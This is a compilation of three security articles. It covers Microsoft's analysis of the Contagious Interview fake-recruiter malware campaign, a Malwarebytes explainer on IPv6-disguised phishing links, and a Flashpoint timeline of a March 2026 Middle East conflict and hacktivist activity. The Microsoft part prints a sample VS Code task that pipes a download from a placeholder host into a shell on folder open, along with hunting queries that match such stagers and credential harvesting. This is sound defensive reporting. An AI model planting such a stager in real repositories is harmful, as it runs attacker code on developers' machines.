
Contagious Interview: Malware delivered through fake developer job interviews

Microsoft Defender Experts has observed the Contagious Interview campaign, a sophisticated social engineering operation active since at least December 2022. Microsoft continues to detect activity associated with this campaign in recent customer environments; the campaign targets software developers at enterprise solution providers and at media and communications firms by abusing the trust inherent in modern recruitment workflows.

Threat actors repeatedly achieve initial access through convincingly staged recruitment processes that mirror legitimate technical interviews. These engagements often include recruiter outreach, technical discussions, assignments, and follow-ups, ultimately persuading victims to execute malicious packages or commands under the guise of routine evaluation tasks.

This campaign represents a shift in initial access tradecraft. By embedding malware delivery directly into the interview tools, coding exercises, and assessment workflows that developers inherently trust, threat actors exploit the confidence job seekers place in the hiring process during periods of high motivation and time pressure, lowering suspicion and resistance.

Attack chain overview

Initial access

As part of a fake job interview process, threat actors pose as recruiters from cryptocurrency trading firms or AI-based solution providers. Victims who fall for the lure are instructed to clone and execute an NPM package hosted on popular code hosting platforms such as GitHub, GitLab, or Bitbucket. In this scenario, the executed NPM package directly loads a follow-on payload.

Execution of the malicious package triggers additional scripts that ultimately deploy the backdoor in the background. In recent intrusions, threat actors have adapted their technique to leverage Visual Studio Code workflows. When victims open the downloaded package in Visual Studio Code, they are prompted to trust the repository author. If trust is granted, Visual Studio Code automatically executes the repository’s task configuration file, which then fetches and loads the backdoor.

A typical repository hosted on Bitbucket, posing as a blockchain-powered game.
Sample task found in the repository (right: URL shortener redirecting to vercel.app).
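To illustrate the mechanism described above, a malicious task configuration (.vscode/tasks.json) can use Visual Studio Code's folder-open trigger so that a stager runs as soon as the victim grants trust to the repository. The sketch below is illustrative only; the label and the defanged URL are hypothetical placeholders, not observed indicators:

```json
// .vscode/tasks.json -- illustrative sketch only (tasks.json permits comments)
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "install dependencies",
      "type": "shell",
      // Hypothetical, defanged URL; real campaigns used shorteners redirecting to vercel.app
      "command": "curl -sL https://short-link[.]invalid/payload | sh",
      // Runs automatically once the folder is opened and trusted
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```

Because the task carries a benign-looking label and executes in the background, a candidate focused on the coding exercise is unlikely to notice it.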

Follow-up payloads: Invisible Ferret

In the early stages of this campaign, Invisible Ferret was primarily delivered via BeaverTail, an information stealer that also functioned as a loader. In more recent intrusions, however, Invisible Ferret is predominantly deployed as a follow-on payload, introduced after initial access has been established through the beaconing agent or OtterCookie.

Invisible Ferret is a Python-based backdoor used in later stages of the attack chain, enabling remote command execution, extended system reconnaissance, and persistent control after initial access has been secured by the primary backdoor.

Process tree snippet from an incident where the beaconing agent deploys Invisible Ferret.

Other campaigns

Another notable backdoor observed in this campaign is FlexibleFerret, a modular backdoor implemented in both Go and Python variants. It leverages encrypted HTTP(S) and TCP command and control channels to dynamically load plugins, execute remote commands, and support file upload and download operations with full data exfiltration. FlexibleFerret establishes persistence through RUN registry modifications and includes built-in reconnaissance and lateral movement capabilities. Its plugin-based architecture, layered obfuscation, and configurable beaconing behavior contribute to its stealth and make analysis more challenging.

While Microsoft Defender Experts have observed FlexibleFerret less frequently than the backdoors discussed in earlier sections, it remains active in the wild. Campaigns deploying this backdoor rely on similar social engineering techniques, where victims are directed to a fraudulent interview or screening website impersonating a legitimate platform. During the process, users encounter a fabricated technical error and are instructed to copy and paste a command to resolve the issue. This command retrieves additional payloads, ultimately leading to the execution of the FlexibleFerret backdoor.

Code quality observations

Recent samples exhibit characteristics that differ from traditionally engineered malware. The beaconing agent script contains inconsistent error handling, empty catch blocks, and redundant reporting logic that appear minimally refined. Similarly, the FlexibleFerret Python variant combines tutorial-style comments, emoji-based logging, and placeholder secret key markers alongside functional malware logic.

These patterns, including instructional narrative structure and rapid iteration cycles, suggest development workflows that prioritize speed and functional output over refined engineering. While these characteristics may indicate the use of development acceleration tools, they primarily reflect evolving threat actor development practices and rapid tooling adaptation that enable quick iteration on malicious code.

Snippets from the Python variant of FlexibleFerret highlighting tutorial‑style comments and AI‑assisted code with icon‑based logging.

Security implications

This campaign weaponizes hiring processes into a persistent attack channel. Threat actors exploit technical interviews and coding assessments to execute malware through dependency installations and repository tasks, targeting developer endpoints that provide access to source code, CI/CD pipelines, and production infrastructure.

Threat actors harvest API tokens, cloud credentials, signing keys, cryptocurrency wallets, and password manager artifacts. Modular backdoors enable infrastructure rotation while maintaining access and complicating detection.

Organizations should treat recruitment workflows as attack surfaces by deploying isolated interview environments, monitoring developer endpoints and build tools, and hunting for suspicious repository activity and dependency execution patterns.

Mitigation and protection guidance

Harden developer and interview workflows

  • Use a dedicated, isolated environment for coding tests and take-home assignments (for example, a non-persistent virtual machine). Do not use a primary corporate workstation that has access to production credentials, internal repositories, or privileged cloud sessions.
  • Establish a policy that requires review of any recruiter-provided repository before running scripts, installing dependencies, or executing tasks. Treat “paste-and-run” commands and “quick fix” instructions as high-risk.
  • Provide guidance to developers on common red flags: short links redirecting to file hosts, newly created repositories or accounts, unusually complex “assessment” setup steps, and instructions that request disabling security controls or trusting unknown repository authors.

Reduce attack surface from tools commonly abused in this campaign

  • Ensure tamper protection and real-time antivirus protection are enabled, and that endpoints receive security updates. These campaigns often rely on script execution and commodity tooling rather than exploiting a single vulnerability, so layered endpoint protection remains effective.
  • Restrict scripting and developer runtimes where possible (Node.js, Python, PowerShell). In high-risk groups, consider application control policies that limit which binaries can execute and where they can be launched from (for example, preventing developer tool execution from Downloads and temporary folders).
  • Monitor for and consider blocking common “download-and-execute” patterns used as stagers, such as curl/wget piping to shells, and outbound requests to low-reputation hosts used to serve payloads (including short-link redirection services).

Protect secrets and limit downstream impact

  • Reduce the exposure of secrets on developer endpoints. Use just-in-time and short-lived credentials, store secrets in vaults, and avoid long-lived tokens in environment files or local configuration.
  • Enforce multifactor authentication and conditional access for source control, CI/CD, cloud consoles, and identity providers to mitigate credential theft from compromised endpoints.
  • Review and restrict access to password manager vaults and developer signing keys. This campaign explicitly targets artifacts such as wallet material, password databases, private keys, and other high-value developer-held secrets.

Detect, investigate, and respond

  • Hunt for execution chains that start from a code editor or developer tool and quickly transition into shell or scripting execution (for example, Visual Studio Code or Cursor → cmd/PowerShell/bash → curl/wget → script execution). Review repository task configurations and build scripts when such chains are observed.
  • Monitor Node.js and Python processes for behaviors consistent with this campaign, including broad filesystem enumeration for credential and key material, clipboard monitoring, screenshot capture, and HTTP POST uploads of collected data.
  • If compromise is suspected, isolate the device, rotate credentials and tokens that may have been exposed, review recent access to code repositories and CI/CD systems, and assess for follow-on payloads and persistence.

Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog. 

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.  

Tactic: Execution
Observed activity: curl or wget command launched from an NPM package to fetch a script from vercel.app or a URL shortener
Coverage: Microsoft Defender for Endpoint
  • Suspicious process execution

Tactic: Execution
Observed activity: Backdoor (beaconing agent, OtterCookie, InvisibleFerret, FlexibleFerret) execution
Coverage: Microsoft Defender for Endpoint
  • Suspicious Node.js process behavior
  • Possible OtterCookie malware activity
  • Suspicious Python library load
  • Suspicious connection to remote service
Coverage: Microsoft Defender Antivirus
  • Suspicious ‘BeaverTail’ behavior was blocked

Tactic: Credential Access
Observed activity: Enumerating sensitive data
Coverage: Microsoft Defender for Endpoint
  • Enumeration of files with sensitive data

Tactic: Discovery
Observed activity: Gathering basic system information and enumerating sensitive data
Coverage: Microsoft Defender for Endpoint
  • System information discovery
  • Suspicious System Hardware Discovery
  • Suspicious Process Discovery

Tactic: Collection
Observed activity: Clipboard data read by a Node.js script
Coverage: Microsoft Defender for Endpoint
  • Suspicious clipboard access

Hunting queries

Microsoft Defender XDR  

Microsoft Defender XDR customers can run the following queries to find related activity in their networks.

Run the following query to identify suspicious script executions where curl or wget is used to fetch remote content.

DeviceProcessEvents
| where ProcessCommandLine has_any ("curl", "wget")
| where ProcessCommandLine has_any ("vercel.app", "short.gy") and ProcessCommandLine has_any (" | cmd", " | sh")

Run the following query to identify OtterCookie-related Node.js activity by correlating clipboard monitoring, recursive file scanning, curl-based exfiltration, and VM-awareness patterns.

DeviceProcessEvents
| where
    (
        (InitiatingProcessCommandLine has_all ("axios", "const uid", "socket.io") and InitiatingProcessCommandLine contains "clipboard") or // Clipboard watcher + socket/C2 style bootstrap
        (InitiatingProcessCommandLine has_all ("excludeFolders", "scanDir", "curl ", "POST")) or // Recursive file scan + curl POST exfil
        (ProcessCommandLine has_all ("*bitcoin*", "credential", "*recovery*", "curl ")) or // Credential/crypto keyword harvesting + curl usage
        (ProcessCommandLine has_all ("node", "qemu", "virtual", "parallels", "virtualbox", "vmware", "makelog")) or // VM / sandbox awareness + logging
        (ProcessCommandLine has_all ("http", "execSync", "userInfo", "windowsHide")
            and ProcessCommandLine has_any ("socket", "platform", "release", "hostname", "scanDir", "upload")) // Generic OtterCookie-ish execution + environment collection + upload hints
    )

Run the following query to detect possible Node.js beaconing agent activity.

DeviceProcessEvents
| where ProcessCommandLine has_all ("handleCode", "AgentId", "SERVER_IP")

Run the following query to detect possible BeaverTail and InvisibleFerret activity.

DeviceProcessEvents
| where FileName has "python" or ProcessVersionInfoOriginalFileName has "python"
| where ProcessCommandLine has_any (@'/.n2/pay', @'\.n2/pay', @'\.npl', '/.npl', @'/.n2/bow', @'\.n2/bow', '/pdown', '/.sysinfo', @'\.n2/mlip', @'/.n2/mlip')

Run the following query to detect credential enumeration activity.

DeviceProcessEvents
| where InitiatingProcessParentFileName has "node"
| where (InitiatingProcessCommandLine has_all ("cmd.exe /d /s /c", " findstr /v", '\"dir')
and ProcessCommandLine has_any ("account", "wallet", "keys", "password", "seed", "1pass", "mnemonic", "private"))
or ProcessCommandLine has_all ("-path", "node_modules", "-prune -o -path", "vendor", "Downloads", ".env")

Microsoft Sentinel  

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.   

References

This research is provided by Microsoft Defender Security Research with contributions from Balaji Venkatesh S.

Learn more   

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.   


The post Contagious Interview: Malware delivered through fake developer job interviews appeared first on Microsoft Security Blog.


Phishers hide scam links with IPv6 trick in “free toothbrush” emails

A recurring lure in phishing emails impersonating United Healthcare is the promise of a free Oral-B toothbrush. But the interesting part isn’t the toothbrush. It’s the link.

Two examples of phishing emails

Recently we found that these phishers have moved from using Microsoft Azure Blob Storage links that look like this:

https://{string}.blob.core.windows.net/{same string}/1.html

to links that use an IPv4-mapped IPv6 address to hide the destination IP in a way that looks confusing but is still perfectly valid and routable. For example:

http://[::ffff:5111:8e14]/

In URLs, putting an IP in square brackets means it’s an IPv6 literal. So [::ffff:5111:8e14] is treated as an IPv6 address.

::ffff:x:y is a standard form called an IPv4-mapped IPv6 address, used to represent an IPv4 address inside IPv6 notation. The last 32 bits (the x:y part) encode the IPv4 address.

So we need to convert 5111:8e14 to an IPv4 address. 5111 and 8e14 are hexadecimal numbers. In theory that means:

  1. 0x5111 in decimal = 20753
  2. 0x8e14 in decimal = 36372

But for IPv4-mapped addresses, those last 32 bits are treated as four separate bytes. Unpacking 0x51 0x11 0x8e 0x14:

  1. 0x51 = 81
  2. 0x11 = 17
  3. 0x8e = 142
  4. 0x14 = 20

So, the IPv4 address this URL leads to is 81.17.142.20.
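For defenders triaging links like this, the conversion above can be verified in a few lines of Python using only the standard library (the URL is the one from the example email):

```python
import ipaddress
import struct
from urllib.parse import urlparse

url = "http://[::ffff:5111:8e14]/"

# urlparse strips the square brackets from the IPv6 host literal
host = urlparse(url).hostname                    # '::ffff:5111:8e14'
addr = ipaddress.IPv6Address(host)

# .ipv4_mapped returns the embedded IPv4 address (None if not a mapped address)
print(addr.ipv4_mapped)                          # 81.17.142.20

# Equivalent manual decoding: take the low 32 bits and unpack them as 4 bytes
low32 = int(addr) & 0xFFFFFFFF
print(".".join(str(b) for b in struct.pack(">I", low32)))  # 81.17.142.20
```

The same two-step check (extract the bracketed host, then test for an IPv4-mapped form) generalizes to other obfuscated literals seen in phishing URLs.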

The emails are variations on a bogus reward scam in which scammers pretending to be United Healthcare use a premium Oral‑B iO toothbrush as bait. Victims are sent to a fast‑rotating landing page where the likely endgame is the collection of personally identifiable information (PII) and card data under the guise of confirming eligibility or paying a small shipping fee.

How to stay safe

What to do if you entered your details

If you submitted your card details:

  • Contact your bank or card issuer immediately and cancel the card
  • Dispute any unauthorized charges
  • Don’t wait for fraud to appear. Stolen card data is often used quickly
  • Change passwords for accounts linked to the email address you provided
  • Run a full scan with a reputable security product

Other ways to stay safe:

Indicators of Compromise (IOCs)

81.17.142.40

15.204.145.84

redirectingherenow[.]com

redirectofferid[.]pro


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.


Escalation in the Middle East: Tracking “Operation Epic Fury” Across Military and Cyber Domains


This post tracks the convergence of kinetic warfare, psychological operations, and cyber activity as the conflict expands across the Middle East and beyond.

March 11, 2026

On February 28, the United States and Israel launched coordinated strikes across Iran under Operation Epic Fury (also referenced in reporting as Operation Lion’s Roar). The opening phase focused on decapitating senior Iranian leadership while degrading missile infrastructure, launch systems, and air defenses. In the hours that followed, Iran initiated large-scale retaliation — expanding the conflict beyond Iranian territory and into a region-wide exchange that touched multiple Gulf states and allied military assets.

Since those initial strikes, the conflict has rapidly widened and accelerated. What began as a concentrated campaign against leadership and missile capabilities has developed into a sustained regional war with an expanding set of targets, including economic and logistical infrastructure. Simultaneously, cyber operations and psychological messaging have been used alongside kinetic action, creating a hybrid operating environment in which disruption is shaped as much by information control and infrastructure compromise as it is by missiles and airstrikes.

Flashpoint analysts are tracking the conflict across physical, cyber, and geopolitical domains. The timeline and sections below summarize key developments and risk indicators observed from February 28 through March 10.

Operation Epic Fury Timeline: March 2026 Conflict Updates

February 28, 2026 — Initial Strikes and Regional Retaliation

Feb 28
07:00 UTC
US and Israeli forces launch coordinated operations targeting Iranian missile sites and strategic infrastructure.
07:30 UTC
Strike reported on Supreme Leader Ali Khamenei’s compound/office in Tehran; subsequent updates describe his death as confirmed.
08:04 UTC
Missile strike hits a girls’ school in Minab; reports indicate significant civilian casualties.
13:30 UTC
Iran retaliates with reported strikes against Jebel Ali port (Dubai) and Camp Arifjan (Kuwait).
15:00 UTC
Ballistic missiles target Al Udeid (Qatar) and Ali Al Salem (Kuwait) air bases.
17:40 UTC
A Shahed-136 drone hits a radar installation at the US Naval Support Activity in Bahrain (5th Fleet-associated).
20:00 UTC
Iran launches a wave of missiles toward Israel (reported as ~125).

In parallel to these events, Flashpoint observed immediate system-level disruption: flight suspensions at Dubai airports following nearby strikes, and Iran’s move to blockade the Strait of Hormuz, elevating global energy and logistics risk.

March 1, 2026 — Air War Over Tehran, Soft Targets, and Hybrid Expansion

By March 1, the conflict had shifted from stand-off strikes to direct air operations over Tehran, signaling degradation of Iran’s integrated air defenses over the capital. Iranian state media described a transition to “offensive defense,” and retaliatory activity expanded across the region.

Notable developments included the reported strike on the Crowne Plaza Hotel in Manama, Bahrain, signaling increased risk to soft targets and commercial environments. Flashpoint also observed indicators of command-and-control friction on the Iranian side, including a reported friendly-fire incident involving the sanctioned “shadow fleet” tanker Skylight.

Mar 1
01:30 UTC
Press TV announces a massive retaliatory wave against US and Israeli bases.
04:45 UTC
A massive explosion rocks Erbil, Iraq, near US and coalition facilities.
05:30 UTC
Israeli Defense Minister Israel Katz confirms IAF jets are now dropping heavy munitions directly over Tehran.
06:15 UTC
The “shadow fleet” tanker Skylight (previously sanctioned by the US) is struck by an Iranian missile in a friendly-fire incident.
07:00 UTC
An Iranian projectile strikes the Crowne Plaza Hotel in Manama, Bahrain, causing multiple civilian casualties.
09:00 UTC
IDF confirms the mobilization of 100,000 reservists to defend against Iran and its regional proxies.
11:30 UTC
Heavy, continuous IAF bombardment of IRGC command-and-control sites in Tehran is reported.
13:15 UTC
An Iranian Shahed drone successfully hits the American Ali Al Salem Air Base in Kuwait.
15:00 UTC
UK Prime Minister Keir Starmer announces the deployment of experienced Ukrainian counter-UAS operators to the Gulf.
18:30 UTC
IDF confirms Hezbollah has begun firing missiles from Lebanon, opening a major new front in the north.
20:00 UTC
IRGC claims waves 7 and 8 of “Operation True Promise 4” are underway, declaring the Ali Al Salem base “completely disabled”.

March 2, 2026 — Infrastructure and Economic Warfare Escalation

Mar 2
Early AM
Iranian Shahed-136 drones strike Saudi Aramco’s Ras Tanura facility.
AM
AWS confirms its UAE data center was impacted by physical attacks, resulting in significant service disruptions.
12:35 UTC
An unmanned drone strikes the runway of the UK’s RAF Akrotiri base in Cyprus.
~17:00 UTC
IDF issues evacuation warnings for Tehran’s Evin district and Southern Beirut.
21:00 UTC
CENTCOM confirms six US service members killed in action (updated figure).
PM
Israeli airstrikes destroy Iran’s national broadcasting headquarters (IRIB) and the Assembly of Experts’ building in Tehran.
Late PM
US forces confirm Iran’s naval capability in the Gulf of Oman has been neutralized (reported sinking of all 11 previously active warships).

March 3, 2026 — Expansion of Infrastructure Warfare and Regional Combat

Mar 3
Early AM
IAF strikes the Iranian Regime’s Leadership Compound, dismantling a heavily secured leadership site.
AM
An Iranian drone attack sets the US Consulate in Dubai on fire; France deploys Rafale jets to protect military bases in the UAE.
~13:00 UTC
An airstrike hits the Defense Ministry’s Iran Electronics Industries facility in Isfahan.
PM
US and Israeli forces destroy Mehrabad Airport in Tehran to prevent regime officials from fleeing.
18:00 UTC
A Farsi-language numbers station appears on 7910 kHz radio frequencies, believed to be transmitting coded instructions to sleeper cells.
PM
The White House releases the full objectives of Operation Epic Fury, defining it as a major combat operation focused on destroying Iran’s missile and naval forces.
Late PM
A GBU-31 bunker-buster strike destroys an IRGC-linked site in Urmia.

March 5, 2026 — Offensive Defense and Geographic Expansion

Mar 5
04:00 UTC
Iranian attack drones strike Nakhchivan International Airport in Azerbaijan, causing explosions near civilian infrastructure.
06:30 UTC
Azerbaijan’s Ministry of Defence places its military on highest alert and prepares potential retaliatory measures.
09:15 UTC
A complex missile and drone attack triggers a major fire at Ali Al Salem Air Base in Kuwait.
11:45 UTC
The Israeli Air Force conducts large-scale strikes against roughly 200 targets in western and central Iran, focusing on ballistic missile launch systems.
18:00 UTC
Iraq’s national power grid reportedly collapses, resulting in a nationwide blackout.

March 6, 2026 — Regime Fragmentation and Strategic Targeting

Mar 6
AM
Approximately 50 Israeli aircraft drop more than 100 bombs on an underground bunker within Tehran’s leadership compound, reportedly eliminating remaining senior regime figures.
AM
US forces destroy a hidden Iranian ballistic missile factory located inside Tehran.
Mid-Day
Israeli Air Force eliminates Hossein Taeb, former head of the IRGC Intelligence Organization, in a targeted strike on his residence.
PM
Azerbaijan begins moving artillery and military equipment toward the Iranian border while evacuating diplomatic personnel from Tehran and Tabriz.
Active
Mehrabad International Airport remains under heavy combined US–Israeli bombardment as strikes continue against remaining regime infrastructure.
Late PM
US leadership issues a public demand for Iran’s “unconditional surrender,” rejecting negotiated settlement proposals.

March 8–9, 2026 — Leadership Consolidation and Hybrid Warfare Expansion

Mar 8
Mar 8
Mojtaba Khamenei is officially appointed Supreme Leader following the death of Ayatollah Ali Khamenei.
Mar 8
Israeli forces kill Abolghasem Babaeian, newly appointed military secretary to the Supreme Leader, in a rapid-response airstrike in Tehran.
22:46 UTC
Hacktivist group Cyber Islamic Resistance claims defacement of the Kurdish Peshmerga special forces website (unverified).
23:23 UTC
Cyber Islamic Resistance claims control of a Saudi medical care application website (unverified).
Mar 9
Mar 9
Bahraini desalination and oil infrastructure is struck, causing injuries and triggering a declaration of force majeure.
Mar 9
Grand Ayatollah Sistani issues a fatwa declaring a “collective religious obligation” for communal defense.
11:12 UTC
Pro-Russian hacktivist group NoName057(16) claims DDoS attacks against Israeli political parties and defense contractor Elbit Systems.
15:26 UTC
Reporting confirms the Iranian MOIS-linked group MuddyWater has infiltrated US aerospace and defense networks.
16:06 UTC
Iran’s nationwide internet blackout enters its sixth day.

March 10, 2026 — Decentralized Retaliation and Economic Pressure

Mar 10
13:35 UTC
Multiple reports indicate that major Iranian banks, including Bank Melli Iran and Bank Sepah, are unable to provide services following suspected cyberattacks.
15:20 UTC
A drone strike hits the Ruwais industrial complex in Abu Dhabi, forcing the shutdown of the Middle East’s largest oil refinery.
18:00 UTC
The UAE Defense Ministry reports intercepting hundreds of projectiles over a 24-hour period, confirming six deaths and more than 120 injuries.

March 1–10, 2026 — Infrastructure Targeting and Internationalization

Between March 1 and March 10, Flashpoint analysis indicates the conflict has evolved from broad regional exchanges into systematic targeting of energy, data, and command-and-control infrastructure with global downstream impact. Key reported incidents included a strike on Saudi Aramco’s facility at Ras Tanura and a disruption at an AWS data center in the UAE attributed to physical impact on the facility. The Israel–Lebanon front also intensified following Hezbollah missile launches and a broad Israeli response across Lebanon. March 2 also featured expanded strikes against Tehran’s state apparatus, including reported destruction of Iran’s national broadcasting headquarters and the Assembly of Experts’ building.

Flashpoint also tracked growing exposure for NATO-aligned assets, including reported damage at RAF Akrotiri (Cyprus). Meanwhile, the UK, France, and Germany signaled readiness to support action focused on Iran’s missile and drone capabilities — an indicator of potential further conflict expansion.

By March 3 and March 4, targeting patterns expanded further to include strategic communications infrastructure and hardened military facilities. Satellite analysis confirmed damage to US military communication nodes and early-warning radar infrastructure across multiple Gulf bases, while naval combat escalated with a US submarine sinking the Iranian frigate IRIS Dena in the Indian Ocean. These developments signal a shift toward degrading regional command-and-control networks alongside continued pressure on energy and logistics infrastructure.

Developments on March 5 further expanded the geographic scope of the conflict. Iranian drone strikes targeted infrastructure in Azerbaijan, drawing the country’s military onto high alert and raising the possibility of a northern expansion of the kinetic theater. At the same time, complex missile and drone attacks continued against US military facilities in the Gulf, including a major strike that caused significant damage at Ali Al Salem Air Base in Kuwait. These developments reflect a continued shift toward distributed regional engagements rather than isolated bilateral exchanges.

Developments on March 6 through March 9 indicate continued degradation of Iranian command infrastructure alongside widening regional impacts. Precision strikes reportedly targeted remaining Iranian leadership compounds and clandestine missile and nuclear facilities, while diplomatic evacuations and military mobilization along Iran’s northern border suggested the potential expansion of the conflict into new geographic theaters. At the same time, infrastructure targeting expanded beyond energy and communications to include water desalination facilities and additional cloud and data infrastructure, highlighting the growing risk to civilian survival systems and regional economic stability.

Developments on March 10 further underscored the economic dimension of the conflict. A drone strike on the Ruwais industrial complex in Abu Dhabi forced the shutdown of the region’s largest oil refinery, while global shipping giant MSC suspended exports from Gulf ports due to continued instability in the Strait of Hormuz. These disruptions highlight how the conflict is increasingly affecting global energy production and maritime supply chains beyond the immediate combat zone.

The Escalating Cyber and Information Front

From the opening hours, Flashpoint assessed that cyber activity in this conflict is not ancillary — it is being used as a synchronized force multiplier.

One of the most consequential developments has been the use of infrastructure compromise for psychological operations at national scale. Flashpoint observed the compromise of the BadeSaba prayer app ecosystem, enabling push notifications to be delivered to large user populations. Messaging included calls for mobilization and later content aimed at regime security forces and protest coordination. This reflects a shift from influence on social platforms toward platform-layer manipulation, where trusted everyday applications become vectors for narrative control during kinetic shock.

Flashpoint also observed disruption and interference affecting state-run Iranian outlets (including IRNA and ISNA), contributing to an information vacuum and driving users toward unverified channels for situational awareness.

As kinetic pressure increased, Flashpoint tracking indicated fluctuations in cyber tempo. Some updates suggested a temporary lull in broader Iranian cyber activity — potentially due to operational disruption from physical strikes — while other indicators pointed to a risk of renewed disruptive campaigns, including activity linked to personas associated with state-aligned hacktivist ecosystems.

On March 2, Flashpoint observed reporting on a coordinated campaign branded #OpIsrael, involving pro-Iranian and pro-Russian-aligned actors, with activity spanning DDoS, data exposure, and claimed intrusions.

  • NoName057(16) + Cyber Islamic Resistance: Claimed large-scale DDoS activity targeting Israeli defense and municipal entities (including Elbit Systems).
  • Cyber Islamic Resistance: Claimed breach of an Israeli health insurance provider and released internal CCTV footage as evidence of access.
  • FAD Team (Iraq’s “Resistance Hub”): Claimed SQL injection activity and PII exposure across a wide set of targets, including US and non-US entities.
  • Fatimion Cyber Team: Claimed disruption targeting Gulf states perceived as US-aligned, including Bahrain and Qatar-linked targets.
  • Infrastructure claims: FAD Team claimed access to firewall monitoring dashboards in Mecca and Medina.

Additional activity observed March 3–4 includes:

  • Handala Team: Claimed a breach of Saudi Aramco infrastructure and released internal documentation and schematics intended to validate the attack. Flashpoint has not verified these claims.
  • PalachPro: Signaled coordination with Iranian hackers to amplify cyber campaigns targeting US and Israeli organizations.
  • NoName057(16): Claimed access to an Israeli water management SCADA system under the ongoing #OpIsrael campaign. These claims remain unverified.
  • Fatemiyoun Electronic Team: Conducted a denial-of-service attack against the Kuwaiti News Agency website.
  • Targeting rhetoric shift: Pro-IRGC propaganda channels began framing major technology companies — including Google — as potential targets due to alleged support of US military operations.

Additional activity reported on March 5 indicates a renewed surge in coordinated cyber operations under the #OpIsrael banner:

  • NoName057(16): Claimed administrative access to Israeli industrial control systems and SCADA interfaces, alleging the ability to manipulate pump activity and water flow. These claims remain unverified but represent a high-risk threat to essential services.
  • Handala Group: Claimed the exfiltration and wiping of approximately 1.3 TB of data from Atlas Insurances Ltd., while simultaneously launching a doxxing campaign targeting individuals alleged to be connected to Israeli intelligence.
  • Fatemiyoun Electronic Team: Claimed responsibility for taking multiple government ministry websites offline in Jordan and Kuwait and releasing personal data from a Kuwaiti government application.
  • Cyber Islamic Resistance (Team 313): Claimed disruptions targeting Bahraini government infrastructure and published images allegedly taken from compromised surveillance camera networks.

Additional activity reported March 6–9 includes:

  • MuddyWater (MOIS / Seedworm): Verified intrusions into US aerospace, defense, aviation, and financial networks using a newly identified backdoor known as “Dindoor.” These operations reportedly began prior to the kinetic phase of the conflict and have continued during the war.
  • Telegram-Based Recruitment Networks: Iranian intelligence is reportedly using Telegram channels to recruit loosely affiliated operatives and criminal intermediaries across Europe for espionage and potential sabotage operations.
  • Handala: Claimed to have wiped Israeli military weather servers and intercepted urban security feeds in Jerusalem (unverified).
  • Cyber Islamic Resistance (Team 313): Claimed multiple website defacements targeting regional institutions, including Kurdish and Saudi organizations (unverified).
  • NoName057(16): Continued distributed denial-of-service attacks under the #OpIsrael banner targeting Israeli political parties, telecommunications companies, and defense contractors.

Additional activity reported March 10 includes:

  • Suspected banking-sector attacks: Multiple reports indicate that Iran’s largest banks, including Bank Melli Iran and Bank Sepah, experienced widespread service disruptions following suspected cyberattacks.
  • NoName057(16): The pro-Russian group continued operations under the #OpIsrael banner, claiming distributed denial-of-service attacks targeting Israeli and Cypriot infrastructure, including Israel’s national water company Mekorot and UAV firm E.M.I.T. Aviation (unverified).
  • BD Anonymous & MrSutrator Alliance: A newly formed pro-Palestinian cyber alliance announced “Operation Electronic Holocaust,” targeting Israeli defense contractor Rafael (unverified).
  • DieNet: The group issued warnings of a potential large-scale cyber campaign targeting Israeli government infrastructure (unverified).

These developments indicate continued expansion of cyber activity across both offensive and retaliatory fronts, including financial infrastructure and public-facing services.

Strategic Chokepoints and Systemic Risk

Two chokepoints have emerged as persistent systemic risk drivers: maritime energy transit and regional air mobility.

Iran’s reported blockade of the Strait of Hormuz remains the primary near-term global economic concern. Flashpoint reporting also indicates an explicit escalation toward energy system disruption, with IRGC messaging framing a “war on energy supplies” and kinetic targeting expanding to oil and gas infrastructure. Even partial disruption introduces immediate volatility in energy markets and maritime logistics, increasing shipping costs, insurance premiums, and delivery delays well beyond the region.

Additional developments reported on March 3 indicate the IRGC has conducted strikes against multiple oil tankers operating in the Strait of Hormuz, further elevating risks to global energy transport. Iran has also declared the waterway effectively closed to most commercial shipping, introducing the possibility of sustained maritime disruption.

Infrastructure targeting has expanded to include desalination facilities and water supply systems in the Gulf. Because these plants provide essential potable water to large urban populations, attacks on desalination infrastructure represent a significant escalation that directly threatens civilian survival systems and urban stability across the region.

Global shipping disruption has also intensified. As of March 10, following continued instability and the effective closure of the Strait of Hormuz, major shipping firms including MSC have suspended exports from Gulf ports, introducing additional pressure on global logistics and energy markets.

Airspace disruption and interruptions to transit hubs — especially the reported suspensions affecting Dubai — compound that risk. Taken together, the maritime and aviation constraints create a reinforcing cycle: constrained routes increase congestion elsewhere, raise operational costs, and compress the time available for organizations to reroute people and goods.

With regional airports and Gulf maritime corridors under threat, organizations should plan for sustained degradation of commercial mobility and service availability rather than short-lived closures.

Business and Security Implications

As the conflict expands into commercial infrastructure and civilian logistics, enterprise exposure now extends well beyond traditional “high-risk” sectors. The targeting patterns observed throughout this conflict indicate that energy infrastructure, cloud assets, maritime corridors, and civilian-facing systems are all within scope.

Organizations should plan for volatility across personnel security, supply chains, cyber disruption, and regional service availability.

1. Personnel and Physical Security

Recent incidents including strikes near Gulf transit hubs, the targeting of a Western-branded hotel in Bahrain, and warnings regarding potential asymmetric attacks underscore that risk is no longer confined to military installations.

  • The US State Department issued an expanded “DEPART NOW” advisory for Americans across 16 Middle Eastern countries, reflecting elevated risk to civilian and commercial environments.
  • US Embassy in Amman reported active “duck and cover” alarms, signaling increased threat pressure on diplomatic facilities beyond core combat zones.
  • Reporting indicates Iranian threats now extend to US bases in Europe, expanding the geographic risk envelope.
  • Drone attacks targeting diplomatic facilities — including the US Consulate in Dubai and attempted strikes on the US Embassy in Riyadh — indicate expanding risk to diplomatic and government installations.
  • Precautionary evacuations have also been implemented near US embassies across several Gulf states as regional tensions and retaliatory threats continue to rise.

